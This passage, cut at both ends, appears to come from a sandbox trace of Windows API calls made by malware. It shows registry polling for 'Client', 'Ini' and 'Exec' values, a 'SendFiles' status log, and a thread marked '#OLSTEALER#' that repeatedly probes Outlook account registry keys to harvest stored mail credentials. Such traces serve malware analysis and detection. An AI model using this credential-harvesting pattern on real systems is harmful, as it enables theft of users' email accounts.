(hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x74ada7c [0262.917] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0262.917] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x74ada7c [0262.917] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0262.917] CloseHandle (hObject=0x182c) returned 1 [0262.917] CloseHandle (hObject=0x12c4) returned 1 [0262.918] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegDeleteValueA") returned 0x7ff976f82960 [0262.919] RegDeleteValueA (hKey=0x328, lpValueName="2A15B805C2DE35470F") returned 0x0 [0262.919] UnmapViewOfFile (lpBaseAddress=0x260000) returned 1 [0262.919] CloseHandle (hObject=0x930) returned 1 [0262.919] wsprintfA (in: param_1=0x79c8960, param_2="SendFiles status %u\n" | out: param_1="SendFiles status 0\n") returned 19 [0262.919] lstrlenA (lpString="SendFiles status 0\n") returned 19 [0262.919] GetSystemTime (in: lpSystemTime=0x7c3f690 | out: lpSystemTime=0x7c3f690*(wYear=0x7e2, wMonth=0xb, wDayOfWeek=0x2, wDay=0x6, wHour=0x0, wMinute=0x1b, wSecond=0x31, wMilliseconds=0x334)) [0262.919] wsprintfA (in: param_1=0x7c3f680, param_2="%02u:%02u:%02u " | out: param_1="00:27:49 ") returned 9 [0262.919] IStream:Stat (in: This=0xd1f0210, pstatstg=0x7c3f6a0, grfStatFlag=0x1 | out: pstatstg=0x7c3f6a0) returned 0x0 [0262.919] IStream:RemoteSeek (in: This=0xd1f0210, dlibMove=0x0, dwOrigin=0x2, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0262.919] ISequentialStream:RemoteWrite (in: This=0xd1f0210, pv=0x7c3f680*=0x30, cb=0x9, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0262.919] ISequentialStream:RemoteWrite (in: This=0xd1f0210, pv=0x79c8960*=0x53, cb=0x13, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0262.919] ISequentialStream:RemoteWrite (in: This=0xd1f0210, pv=0x74c991c*=0xd, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0262.919] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0262.919] RegEnumValueA (in: hKey=0x328, dwIndex=0x0, lpValueName=0x79ce7b0, lpcchValueName=0x7c3f7b8, lpReserved=0x0, lpType=0x7c3f7bc, lpData=0x79ce6a0, lpcbData=0x7c3f7b0 | out: lpValueName="2A15B805C2DE35470F", lpcchValueName=0x7c3f7b8, lpType=0x7c3f7bc, lpData=0x79ce6a0, lpcbData=0x7c3f7b0) returned 0x103 [0262.919] RegCloseKey (hKey=0x328) returned 0x0 [0262.919] WaitForSingleObject (hHandle=0x0, dwMilliseconds=0x0) returned 0xffffffff [0262.919] WaitForSingleObject (hHandle=0x137c, dwMilliseconds=0x0) returned 0x102 [0262.919] WaitForMultipleObjects (nCount=0x4, lpHandles=0x7c3f8a0*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0262.919] RegNotifyChangeKeyValue (hKey=0x958, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x1598, fAsynchronous=1) returned 0x0 [0262.919] RegCreateKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x7c3f810 | out: phkResult=0x7c3f810*=0x328) returned 0x0 [0262.920] RegQueryValueExA (in: hKey=0x328, lpValueName="Client", lpReserved=0x0, lpType=0x7c3f808, lpData=0x74f6ba0, lpcbData=0x7c3f800*=0x28 | out: lpType=0x7c3f808*=0x3, lpData=0x74f6ba0*, lpcbData=0x7c3f800*=0x28) returned 0x0 [0262.920] RegCloseKey (hKey=0x328) returned 0x0 [0262.920] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x7c3f810 | out: phkResult=0x7c3f810*=0x328) returned 0x0 [0262.920] RegQueryValueExA (in: hKey=0x328, lpValueName="Ini", lpReserved=0x0, lpType=0x7c3f790, lpData=0x0, lpcbData=0x7c3f808*=0x3 | out: lpType=0x7c3f790*=0x0, lpData=0x0, lpcbData=0x7c3f808*=0x0) returned 0x2 [0262.920] RegCloseKey (hKey=0x328) returned 0x0 [0262.920] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x7c3f8d8 | out: phkResult=0x7c3f8d8*=0x328) returned 0x0 [0262.920] RegQueryValueExA (in: hKey=0x328, lpValueName="Exec", lpReserved=0x0, lpType=0x7c3f7d0, lpData=0x0, lpcbData=0x7c3f930*=0x0 | out: lpType=0x7c3f7d0*=0x0, lpData=0x0, lpcbData=0x7c3f930*=0x0) returned 0x2 [0262.920] RegCloseKey (hKey=0x328) returned 0x0 [0262.920] WaitForMultipleObjects (nCount=0x4, lpHandles=0x7c3f8a0*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0262.920] RegNotifyChangeKeyValue (hKey=0x958, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x1598, fAsynchronous=1) returned 0x0 [0262.920] RegCreateKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x7c3f810 | out: phkResult=0x7c3f810*=0x328) returned 0x0 [0262.920] RegQueryValueExA (in: hKey=0x328, lpValueName="Client", lpReserved=0x0, lpType=0x7c3f808, lpData=0x74f6ba0, lpcbData=0x7c3f800*=0x28 | out: lpType=0x7c3f808*=0x3, lpData=0x74f6ba0*, lpcbData=0x7c3f800*=0x28) returned 0x0 [0262.920] RegCloseKey (hKey=0x328) returned 0x0 [0262.921] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x7c3f810 | out: phkResult=0x7c3f810*=0x328) returned 0x0 [0262.921] RegQueryValueExA (in: hKey=0x328, lpValueName="Ini", lpReserved=0x0, lpType=0x7c3f790, lpData=0x0, lpcbData=0x7c3f808*=0x3 | out: lpType=0x7c3f790*=0x0, lpData=0x0, lpcbData=0x7c3f808*=0x0) returned 0x2 [0262.921] RegCloseKey (hKey=0x328) returned 0x0 [0262.921] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x7c3f8d8 | out: phkResult=0x7c3f8d8*=0x328) returned 0x0 [0262.921] RegQueryValueExA (in: hKey=0x328, lpValueName="Exec", lpReserved=0x0, lpType=0x7c3f7d0, lpData=0x0, lpcbData=0x7c3f930*=0x0 | out: lpType=0x7c3f7d0*=0x0, lpData=0x0, lpcbData=0x7c3f930*=0x0) returned 0x2 [0262.921] RegCloseKey (hKey=0x328) returned 0x0 [0262.921] WaitForMultipleObjects (nCount=0x4, lpHandles=0x7c3f8a0*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0262.921] WaitForSingleObject (hHandle=0x139c, dwMilliseconds=0x0) returned 0x0 [0262.921] SetWaitableTimer (hTimer=0x139c, lpDueTime=0x7c3f938, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0262.921] WaitForSingleObject (hHandle=0x1894, dwMilliseconds=0x0) returned 0x102 [0262.921] WaitForSingleObject (hHandle=0x0, dwMilliseconds=0x0) returned 0xffffffff [0262.921] WaitForSingleObject (hHandle=0x137c, dwMilliseconds=0x0) returned 0x102 [0262.921] WaitForMultipleObjects (nCount=0x4, lpHandles=0x7c3f8a0*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 104 os_tid = 0x954 [0249.129] GetProcAddress (hModule=0x7ff977b60000, lpProcName="CoInitializeEx") returned 0x7ff9778a3170 [0249.129] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0249.129] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x1c4f880 | out: ppstm=0x1c4f880*=0xd1ee010) returned 0x0 [0249.129] IStream:RemoteSeek (in: This=0xd1ee010, dlibMove=0x0, dwOrigin=0x1, plibNewPosition=0x1c4f760 | out: plibNewPosition=0x1c4f760) returned 0x0 [0249.129] lstrlenA (lpString="#OLSTEALER#\n") returned 12 [0249.129] ISequentialStream:RemoteWrite (in: This=0xd1ee010, pv=0x74c9eb8*=0x23, cb=0xc, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0249.129] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Account Manager", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4f6a0 | out: phkResult=0x1c4f6a0*=0x94c) returned 0x0 [0249.129] RegQueryValueExA (in: hKey=0x94c, lpValueName="Outlook", lpReserved=0x0, lpType=0x1c4f700, lpData=0x0, lpcbData=0x1c4f6d8*=0x0 | out: lpType=0x1c4f700*=0x0, lpData=0x0, lpcbData=0x1c4f6d8*=0x0) returned 0x2 [0249.129] RegCloseKey (hKey=0x94c) returned 0x0 [0249.129] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Account Manager", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4f6a0 | out: phkResult=0x1c4f6a0*=0x94c) returned 0x0 [0249.130] RegQueryValueExA (in: hKey=0x94c, lpValueName="Outlook", lpReserved=0x0, lpType=0x1c4f700, lpData=0x0, lpcbData=0x1c4f6d8*=0x0 | out: lpType=0x1c4f700*=0x0, lpData=0x0, lpcbData=0x1c4f6d8*=0x0) returned 0x2 [0249.130] RegCloseKey (hKey=0x94c) returned 0x0 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.130] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.131] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.132] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4edc8 | out: phkResult=0x1c4edc8*=0x0) returned 0x2 [0249.132] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", phkResult=0x1c4ef00 | out: phkResult=0x1c4ef00*=0x0) returned 0x2 [0249.140] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.140] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.140] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.140] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.140] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.140] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.140] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4ed30 | out: phkResult=0x1c4ed30*=0x0) returned 0x2 [0249.140] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging 